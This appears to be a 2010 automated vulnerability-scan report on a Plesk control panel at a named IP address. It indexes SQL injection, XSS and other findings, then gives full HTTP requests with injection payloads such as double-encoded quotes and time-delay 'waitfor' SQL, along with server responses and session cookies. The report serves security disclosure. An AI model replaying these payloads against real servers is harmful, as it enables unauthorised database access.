Report generated by XSS.CX at Sun Oct 10 00:24:14 CDT 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. SQL injection

1.1. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [User-Agent HTTP header]

1.2. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [filelist cookie]

1.3. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [filter parameter]

1.4. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [show-getting-started-popup cookie]

1.5. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [subcmd parameter]

1.6. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/ [PHPSESSID cookie]

1.7. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/ [extract[0] parameter]

1.8. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/ [Referer HTTP header]

1.9. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/ [locale cookie]

1.10. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/ [show-getting-started-popup cookie]

1.11. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/ [User-Agent HTTP header]

1.12. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/ [name of an arbitrarily supplied request parameter]

1.13. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/ [name of an arbitrarily supplied request parameter]

1.14. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/ [user cookie]

1.15. http://174.122.23.218:8880/smb/file/email [user cookie]

1.16. http://174.122.23.218:8880/smb/login [force parameter]

1.17. http://174.122.23.218:8880/smb/redirect/pleskin/root// [PLESKSESSID cookie]

1.18. http://174.122.23.218:8880/ [name of an arbitrarily supplied request parameter]

1.19. http://174.122.23.218:8880/domains/sitebuilder_edit.php [User-Agent HTTP header]

1.20. http://174.122.23.218:8880/domains/sitebuilder_edit.php [name of an arbitrarily supplied request parameter]

1.21. http://174.122.23.218:8880/javascript/chk.js.php [PHPSESSID cookie]

1.22. http://174.122.23.218:8880/javascript/chk.js.php [sessionID cookie]

1.23. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/ [PLESKSESSID cookie]

1.24. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/ [SessionID cookie]

1.25. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/ [locale cookie]

1.26. http://174.122.23.218:8880/smb/admin-home/application-items/ [user cookie]

1.27. http://174.122.23.218:8880/smb/app/available/id/apscatalog [name of an arbitrarily supplied request parameter]

1.28. http://174.122.23.218:8880/smb/app/available/id/apscatalog [user cookie]

1.29. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [catalogType parameter]

1.30. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [user cookie]

1.31. http://174.122.23.218:8880/smb/login [loginSection%5Busername%5D parameter]

1.32. http://174.122.23.218:8880/smb/role/create/ [user cookie]

1.33. http://174.122.23.218:8880/smb/role/list/ [user cookie]

1.34. http://174.122.23.218:8880/smb/web/view/id/1/ [user cookie]

2. Cross-site scripting (reflected)

2.1. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [category parameter]

2.2. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [category parameter]

2.3. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [category parameter]

2.4. http://174.122.23.218:8880/smb/file/copy [items%5B0%5D parameter]

2.5. http://174.122.23.218:8880/smb/file/index/type/external/ [folder parameter]

3. Cleartext submission of password

3.1. http://174.122.23.218:8880/smb/user/create/

3.2. http://174.122.23.218:8880/smb/web/create/

3.3. http://174.122.23.218:8880/smb/login

3.4. http://174.122.23.218:8880/smb/my-profile

4. Cookie without HttpOnly flag set

4.1. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/

4.2. http://174.122.23.218:8880/smb/

4.3. http://174.122.23.218:8880/smb/auth/logout

4.4. http://174.122.23.218:8880/smb/redirect/pleskin/

4.5. http://174.122.23.218:8880/smb/redirect/pleskin/root/

4.6. http://174.122.23.218:8880/smb/redirect/pleskin/root//

4.7. http://174.122.23.218:8880/smb/user/list

4.8. http://174.122.23.218:8880/domains/sitebuilder_edit.php

4.9. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/

4.10. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/

4.11. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/

4.12. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/

4.13. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/

4.14. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/

4.15. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/

4.16. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/function.require

4.17. http://174.122.23.218:8880/plesk/dashboard/

4.18. http://174.122.23.218:8880/smb/login

5. Password field with autocomplete enabled

5.1. http://174.122.23.218:8880/smb/user/create/

5.2. http://174.122.23.218:8880/smb/login

5.3. http://174.122.23.218:8880/smb/my-profile

6. XML injection

6.1. http://174.122.23.218:8880/javascript/chk.js.php [PHPSESSID cookie]

6.2. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/ [PLESKSESSID cookie]

7. Cross-domain Referer leakage

7.1. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/

7.2. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/

7.3. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/

7.4. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/

7.5. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/

7.6. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/

7.7. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/

7.8. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/

7.9. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/

7.10. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/

7.11. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/

7.12. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/

7.13. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/

7.14. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/

7.15. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/

7.16. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/

7.17. http://174.122.23.218:8880/plesk/dashboard/

7.18. http://174.122.23.218:8880/smb/app/available/id/apscatalog/

7.19. http://174.122.23.218:8880/smb/app/search-data/catalogId/marketplace

7.20. http://174.122.23.218:8880/smb/file/index/type/external/

7.21. http://174.122.23.218:8880/smb/login

8. File upload functionality

8.1. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/

8.2. http://174.122.23.218:8880/smb/app/add

8.3. http://174.122.23.218:8880/smb/scripts/file-sharing.js

9. Email addresses disclosed

9.1. http://174.122.23.218:8880/smb/email-address/list

9.2. http://174.122.23.218:8880/smb/file

9.3. http://174.122.23.218:8880/smb/file/

9.4. http://174.122.23.218:8880/smb/file/index/

9.5. http://174.122.23.218:8880/smb/file/index/type/

9.6. http://174.122.23.218:8880/smb/file/index/type/external

9.7. http://174.122.23.218:8880/smb/file/index/type/external/

9.8. http://174.122.23.218:8880/smb/file/index/type/private/

9.9. http://174.122.23.218:8880/smb/file/index/type/private/folder/

9.10. http://174.122.23.218:8880/smb/file/index/type/private/folder/admin

9.11. http://174.122.23.218:8880/smb/file/index/type/protected

9.12. http://174.122.23.218:8880/smb/file/index/type/shared

9.13. http://174.122.23.218:8880/smb/my-profile

9.14. http://174.122.23.218:8880/smb/user/list

9.15. http://174.122.23.218:8880/smb/user/list/

10. HTML does not specify charset

10.1. http://174.122.23.218:8880/domains/sitebuilder_edit.php

10.2. http://174.122.23.218:8880/javascript/chk.js.php

10.3. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/

10.4. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/

10.5. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/

10.6. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/

10.7. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/

10.8. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/function.require

10.9. http://174.122.23.218:8880/smb/admin-home/application-items/

10.10. http://174.122.23.218:8880/smb/app/search-data/

10.11. http://174.122.23.218:8880/smb/app/search-data/catalogId/

10.12. http://174.122.23.218:8880/smb/app/search-data/catalogId/marketplace

10.13. http://174.122.23.218:8880/smb/app/top-categories-data/

10.14. http://174.122.23.218:8880/smb/file/index/type/external/

10.15. http://174.122.23.218:8880/smb/file/upload/

10.16. http://174.122.23.218:8880/smb/web/statistics/id/1/

11. Content type incorrectly stated

11.1. http://174.122.23.218:8880/javascript/chk.js.php

11.2. http://174.122.23.218:8880/plesk/

11.3. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/

11.4. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/

11.5. http://174.122.23.218:8880/smb/app/top-categories-data/

11.6. http://174.122.23.218:8880/smb/file/upload/



1. SQL injection  next
There are 34 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [User-Agent HTTP header]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-dir/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/create-dir/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;
Content-Type: multipart/form-data; boundary=--------570965659
Content-Length: 756

----------570965659
Content-Disposition: form-data; name="cmd"

new_dir
----------570965659
Content-Disposition: form-data; name="previous_page"


----------570965659
Content-Disposition: for
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:45 GMT
Connection: close
Content-Length: 91835

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.2. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [filelist cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-dir/

Issue detail

The filelist cookie appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the filelist cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the filelist cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/create-dir/ HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/
Cache-Control: max-age=0
Origin: http://174.122.23.218:8880
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc4B19P6fl5h9Oe6B
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9%2527; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 729

------WebKitFormBoundaryc4B19P6fl5h9Oe6B
Content-Disposition: form-data; name="new_dir"

baseline
------WebKitFormBoundaryc4B19P6fl5h9Oe6B
Content-Disposition: form-data; name="file"

baseline
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:10:52 GMT
Connection: close
Content-Length: 178759

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.3. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [filter parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-dir/

Issue detail

The filter parameter appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the filter parameter. The application took 20098 milliseconds to respond to the request, compared with 3767 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/create-dir/ HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpsdocs%2F
Cache-Control: max-age=0
Origin: http://174.122.23.218:8880
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBAkVSeUBemeIU209
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 994

------WebKitFormBoundaryBAkVSeUBemeIU209
Content-Disposition: form-data; name="filter"

')waitfor%20delay'0%3a0%3a20'--
------WebKitFormBoundaryBAkVSeUBemeIU209
Content-Disposition: form-data; name="page"

0
------WebKitFormBoundaryBAkVSeUBemeIU209
Content-Disposition: form-data; name="page_size"

25
------Web
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 03:17:44 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:18:01 GMT
Connection: close
Content-Length: 22301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

1.4. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [show-getting-started-popup cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-dir/

Issue detail

The show-getting-started-popup cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the show-getting-started-popup cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/create-dir/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/?cmd=chdir&file=%2Fhttpsdocs%2F
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true'; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;
Content-Type: multipart/form-data; boundary=--------2114532707
Content-Length: 1147

----------2114532707
Content-Disposition: form-data; name="page_size"

25
----------2114532707
Content-Disposition: form-data; name="sort"

name
----------2114532707
Content-Disposition: form
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:53 GMT
Connection: close
Content-Length: 91835

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.5. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/ [subcmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-dir/

Issue detail

The subcmd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcmd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the subcmd request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /plesk/client@1/domain@1/hosting/file-manager/create-dir/ HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/
Cache-Control: max-age=0
Origin: http://174.122.23.218:8880
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytBLVkmEX7COvlBri
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 735

------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="new_dir"

%5ebaseline
------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="file"

%5ebaseline
------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="subcmd"

%2527
------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="cmd"

create_dir
------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="lock"

true
----
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 03:31:34 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:31:40 GMT
Connection: close
Content-Length: 36249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
plesk/client@1/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);
...[SNIP]...

Request 2

POST /plesk/client@1/domain@1/hosting/file-manager/create-dir/ HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/
Cache-Control: max-age=0
Origin: http://174.122.23.218:8880
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytBLVkmEX7COvlBri
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 735

------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="new_dir"

%5ebaseline
------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="file"

%5ebaseline
------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="subcmd"

%2527%2527
------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="cmd"

create_dir
------WebKitFormBoundarytBLVkmEX7COvlBri
Content-Disposition: form-data; name="lock"

true
----
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 03:31:41 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:31:45 GMT
Connection: close
Content-Length: 53306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

1.6. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/ [PHPSESSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-file/

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the PHPSESSID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/
